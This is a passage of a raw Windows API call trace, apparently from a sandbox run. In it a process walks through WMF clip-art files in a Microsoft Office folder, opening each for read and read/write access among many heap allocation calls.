[0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0101.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0101.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.211] AreFileApisANSI () returned 1 [0101.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0101.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0101.211] AreFileApisANSI () returned 1 [0101.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0101.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 69 [0101.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.212] GetFileType (hFile=0x33c) returned 0x1 [0101.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0101.212] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.212] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.212] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.212] CloseHandle (hObject=0x33c) returned 1 [0101.216] AreFileApisANSI () returned 1 [0101.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0101.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 69 [0101.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.216] GetFileType (hFile=0x33c) returned 0x1 [0101.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.216] CloseHandle (hObject=0x33c) returned 1 [0101.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.218] AreFileApisANSI () returned 1 [0101.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 69 [0101.218] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc4)) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0101.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0101.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.219] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01251_.WMF", cAlternateFileName="")) returned 1 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0101.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0101.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0101.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.220] AreFileApisANSI () returned 1 [0101.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0101.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.220] AreFileApisANSI () returned 1 [0101.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0101.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 69 [0101.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.221] GetFileType (hFile=0x33c) returned 0x1 [0101.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0101.221] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.221] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.221] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.222] CloseHandle (hObject=0x33c) returned 1 [0101.222] AreFileApisANSI () returned 1 [0101.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0101.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 69 [0101.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.222] GetFileType (hFile=0x33c) returned 0x1 [0101.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0101.222] CloseHandle (hObject=0x33c) returned 1 [0101.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.225] AreFileApisANSI () returned 1 [0101.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0101.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 69 [0101.225] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, 